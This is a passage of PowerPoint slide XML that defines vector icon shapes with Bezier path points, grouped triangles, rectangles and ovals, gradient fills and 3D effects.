                        <a:pt x="4482" y="9996"/>
                        <a:pt x="3946" y="9496"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3717" y="9285"/>
                        <a:pt x="3558" y="9028"/>
                        <a:pt x="3461" y="8724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3359" y="8420"/>
                        <a:pt x="3326" y="8088"/>
                        <a:pt x="3366" y="7723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3397" y="7363"/>
                        <a:pt x="3509" y="6989"/>
                        <a:pt x="3703" y="6610"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3889" y="6231"/>
                        <a:pt x="4160" y="5852"/>
                        <a:pt x="4510" y="5487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5768" y="6694"/>
                        <a:pt x="7022" y="8018"/>
                        <a:pt x="8282" y="9388"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7330" y="9893"/>
                        <a:pt x="6501" y="10164"/>
                        <a:pt x="5799" y="10193"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="19678" y="8570"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18868" y="7915"/>
                        <a:pt x="18055" y="7470"/>
                        <a:pt x="17235" y="7250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16421" y="7031"/>
                        <a:pt x="15603" y="6942"/>
                        <a:pt x="14779" y="6998"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13964" y="7059"/>
                        <a:pt x="13130" y="7236"/>
                        <a:pt x="12296" y="7545"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11462" y="7859"/>
                        <a:pt x="10625" y="8200"/>
                        <a:pt x="9782" y="8593"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8448" y="7115"/>
                        <a:pt x="7114" y="5658"/>
                        <a:pt x="5778" y="4299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="3775"/>
                        <a:pt x="6963" y="3509"/>
                        <a:pt x="7526" y="3490"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8088" y="3467"/>
                        <a:pt x="8631" y="3523"/>
                        <a:pt x="9145" y="3649"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9669" y="3775"/>
                        <a:pt x="10149" y="3883"/>
                        <a:pt x="10590" y="3967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11038" y="4051"/>
                        <a:pt x="11424" y="3958"/>
                        <a:pt x="11765" y="3682"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12123" y="3382"/>
                        <a:pt x="12321" y="2994"/>
                        <a:pt x="12351" y="2526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12376" y="2054"/>
                        <a:pt x="12189" y="1596"/>
                        <a:pt x="11782" y="1147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11258" y="569"/>
                        <a:pt x="10630" y="216"/>
                        <a:pt x="9872" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9126" y="-41"/>
                        <a:pt x="8358" y="-30"/>
                        <a:pt x="7564" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6780" y="309"/>
                        <a:pt x="6032" y="595"/>
                        <a:pt x="5324" y="997"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4617" y="1399"/>
                        <a:pt x="4048" y="1811"/>
                        <a:pt x="3626" y="2213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3464" y="2066"/>
                        <a:pt x="3302" y="1918"/>
                        <a:pt x="3141" y="1773"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2963" y="1614"/>
                        <a:pt x="2739" y="1530"/>
                        <a:pt x="2471" y="1535"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2200" y="1535"/>
                        <a:pt x="1977" y="1647"/>
                        <a:pt x="1793" y="1853"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1615" y="2054"/>
                        <a:pt x="1530" y="2288"/>
                        <a:pt x="1565" y="2536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1589" y="2793"/>
                        <a:pt x="1696" y="2989"/>
                        <a:pt x="1880" y="3139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2044" y="3270"/>
                        <a:pt x="2203" y="3401"/>
                        <a:pt x="2364" y="3537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1731" y="4276"/>
                        <a:pt x="1207" y="5094"/>
                        <a:pt x="795" y="5957"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="6820"/>
                        <a:pt x="130" y="7676"/>
                        <a:pt x="37" y="8509"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-59" y="9346"/>
                        <a:pt x="33" y="10113"/>
                        <a:pt x="298" y="10824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="566" y="11540"/>
                        <a:pt x="1056" y="12148"/>
                        <a:pt x="1774" y="12723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2942" y="13658"/>
                        <a:pt x="4321" y="14056"/>
                        <a:pt x="5915" y="13967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7507" y="13874"/>
                        <a:pt x="9223" y="13415"/>
                        <a:pt x="11064" y="12461"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12532" y="14093"/>
                        <a:pt x="14002" y="15716"/>
                        <a:pt x="15470" y="17223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14849" y="17728"/>
                        <a:pt x="14305" y="18018"/>
                        <a:pt x="13826" y="18111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13344" y="18210"/>
                        <a:pt x="12917" y="18200"/>
                        <a:pt x="12530" y="18088"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12142" y="17971"/>
                        <a:pt x="11782" y="17803"/>
                        <a:pt x="11455" y="17587"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11125" y="17368"/>
                        <a:pt x="10799" y="17181"/>
                        <a:pt x="10474" y="17026"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10154" y="16872"/>
                        <a:pt x="9823" y="16788"/>
                        <a:pt x="9486" y="16783"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9145" y="16778"/>
                        <a:pt x="8785" y="16937"/>
                        <a:pt x="8388" y="17265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7981" y="17606"/>
                        <a:pt x="7777" y="18004"/>
                        <a:pt x="7777" y="18453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7777" y="18897"/>
                        <a:pt x="7991" y="19351"/>
                        <a:pt x="8408" y="19809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8830" y="20268"/>
                        <a:pt x="9379" y="20651"/>
                        <a:pt x="10042" y="20955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10708" y="21259"/>
                        <a:pt x="11455" y="21451"/>
                        <a:pt x="12279" y="21502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13103" y="21559"/>
                        <a:pt x="13970" y="21437"/>
                        <a:pt x="14886" y="21109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15807" y="20787"/>
                        <a:pt x="16721" y="20202"/>
                        <a:pt x="17617" y="19332"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18051" y="19739"/>
                        <a:pt x="18489" y="20127"/>
                        <a:pt x="18921" y="20501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19107" y="20656"/>
                        <a:pt x="19328" y="20731"/>
                        <a:pt x="19601" y="20712"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19861" y="20703"/>
                        <a:pt x="20090" y="20586"/>
                        <a:pt x="20269" y="20375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20455" y="20160"/>
                        <a:pt x="20532" y="19921"/>
                        <a:pt x="20503" y="19674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20477" y="19421"/>
                        <a:pt x="20371" y="19229"/>
                        <a:pt x="20192" y="19089"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19755" y="18752"/>
                        <a:pt x="19321" y="18397"/>
                        <a:pt x="18884" y="18022"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19626" y="17143"/>
                        <a:pt x="20221" y="16217"/>
                        <a:pt x="20664" y="15300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21103" y="14379"/>
                        <a:pt x="21367" y="13490"/>
                        <a:pt x="21453" y="12667"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21540" y="11839"/>
                        <a:pt x="21439" y="11091"/>
                        <a:pt x="21159" y="10412"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20880" y="9725"/>
                        <a:pt x="20386" y="9135"/>
                        <a:pt x="19678" y="8570"/>
                      </a:cubicBezTo>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15" name="AutoShape 54"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8375650" y="2896394"/>
                  <a:ext cx="70644" cy="73819"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10791 197"/>
                    <a:gd name="T1" fmla="*/ T0 w 21188"/>
                    <a:gd name="T2" fmla="+- 0 10794 193"/>
                    <a:gd name="T3" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T4" fmla="+- 0 10791 197"/>
                    <a:gd name="T5" fmla="*/ T4 w 21188"/>
                    <a:gd name="T6" fmla="+- 0 10794 193"/>
                    <a:gd name="T7" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T8" fmla="+- 0 10791 197"/>
                    <a:gd name="T9" fmla="*/ T8 w 21188"/>
                    <a:gd name="T10" fmla="+- 0 10794 193"/>
                    <a:gd name="T11" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T12" fmla="+- 0 10791 197"/>
                    <a:gd name="T13" fmla="*/ T12 w 21188"/>
                    <a:gd name="T14" fmla="+- 0 10794 193"/>
                    <a:gd name="T15" fmla="*/ 10794 h 21203"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21188" h="21203">
                      <a:moveTo>
                        <a:pt x="17615" y="468"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17606" y="468"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14870" y="2476"/>
                        <a:pt x="12200" y="4590"/>
                        <a:pt x="9727" y="6958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7348" y="9227"/>
                        <a:pt x="5200" y="11619"/>
                        <a:pt x="3329" y="14060"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="17962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17970"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-197" y="18786"/>
                        <a:pt x="-106" y="19880"/>
                        <a:pt x="638" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1491" y="21407"/>
                        <a:pt x="2889" y="21407"/>
                        <a:pt x="3746" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3877" y="20460"/>
                        <a:pt x="3984" y="20321"/>
                        <a:pt x="4069" y="20174"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6867" y="16517"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8601" y="14255"/>
                        <a:pt x="10606" y="12027"/>
                        <a:pt x="12824" y="9913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15281" y="7570"/>
                        <a:pt x="17557" y="5758"/>
                        <a:pt x="20329" y="3749"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20321" y="3741"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="20400" y="3684"/>
                        <a:pt x="20473" y="3635"/>
                        <a:pt x="20543" y="3570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21402" y="2753"/>
                        <a:pt x="21402" y="1427"/>
                        <a:pt x="20543" y="606"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19742" y="-161"/>
                        <a:pt x="18472" y="-193"/>
                        <a:pt x="17615" y="468"/>
                      </a:cubicBezTo>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16" name="AutoShape 55"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8448675" y="2649538"/>
                  <a:ext cx="71438" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10803 213"/>
                    <a:gd name="T1" fmla="*/ T0 w 21180"/>
                    <a:gd name="T2" fmla="+- 0 10801 203"/>
                    <a:gd name="T3" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T4" fmla="+- 0 10803 213"/>
                    <a:gd name="T5" fmla="*/ T4 w 21180"/>
                    <a:gd name="T6" fmla="+- 0 10801 203"/>
                    <a:gd name="T7" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T8" fmla="+- 0 10803 213"/>
                    <a:gd name="T9" fmla="*/ T8 w 21180"/>
                    <a:gd name="T10" fmla="+- 0 10801 203"/>
                    <a:gd name="T11" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T12" fmla="+- 0 10803 213"/>
                    <a:gd name="T13" fmla="*/ T12 w 21180"/>
                    <a:gd name="T14" fmla="+- 0 10801 203"/>
                    <a:gd name="T15" fmla="*/ 10801 h 21196"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21180" h="21196">
                      <a:moveTo>
                        <a:pt x="8372" y="11356"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6122" y="13508"/>
                        <a:pt x="3675" y="15444"/>
                        <a:pt x="1144" y="17292"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="963" y="17388"/>
                        <a:pt x="786" y="17493"/>
                        <a:pt x="637" y="17645"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-213" y="18457"/>
                        <a:pt x="-213" y="19774"/>
                        <a:pt x="637" y="20585"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1464" y="21380"/>
                        <a:pt x="2796" y="21397"/>
                        <a:pt x="3652" y="20641"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3665" y="20649"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6364" y="18673"/>
                        <a:pt x="8988" y="16581"/>
                        <a:pt x="11419" y="14263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13759" y="12030"/>
                        <a:pt x="15873" y="9685"/>
                        <a:pt x="17715" y="7283"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20663" y="3427"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20654" y="3419"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21386" y="2600"/>
                        <a:pt x="21357" y="1379"/>
                        <a:pt x="20541" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19697" y="-203"/>
                        <a:pt x="18323" y="-203"/>
                        <a:pt x="17468" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17313" y="760"/>
                        <a:pt x="17197" y="937"/>
                        <a:pt x="17094" y="1114"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14228" y="4857"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="12526" y="7090"/>
                        <a:pt x="10552" y="9275"/>
                        <a:pt x="8372" y="11356"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="31" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
